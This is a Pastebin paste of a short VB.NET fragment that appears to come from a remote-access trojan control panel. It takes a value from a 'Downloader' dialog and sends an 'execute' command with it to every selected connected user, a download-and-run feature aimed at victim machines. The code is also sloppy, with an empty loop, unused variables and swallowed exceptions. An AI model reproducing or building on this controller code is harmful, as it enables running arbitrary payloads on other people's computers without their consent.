Advertisement
SecurityNajaf

#IL_Code 8920

Feb 3rd, 2014
206
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
VB.NET 0.84 KB | None | 0 0
  1.         Try
  2.  
  3.             If Lv1.SelectedItems.Count > 0 Then
  4.                 Dim x() As USER
  5.                 For i = 0 To Lv1.SelectedItems.Count
  6.                 Next
  7.             End If
  8.             Downloader.ShowDialog() ':)
  9.             Dim FCD As String = Downloader.TextBox1.Text
  10.             Dim enumerator As IEnumerator
  11.             Try
  12.                 enumerator = Me.Lv1.SelectedItems.GetEnumerator
  13.                 Do While enumerator.MoveNext
  14.                     Dim user As USER = DirectCast(NewLateBinding.LateGet(RuntimeHelpers.GetObjectValue(enumerator.Current), Nothing, "tag", New Object(0 - 1) {}, Nothing, Nothing, Nothing), USER)
  15.                     Dim JKL As New Downloader
  16.                     user.Send(Me.httpconvert("execute" & Me.Y & FCD))
  17.                 Loop
  18.             Finally
  19.             End Try
  20.         Catch : End Try
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement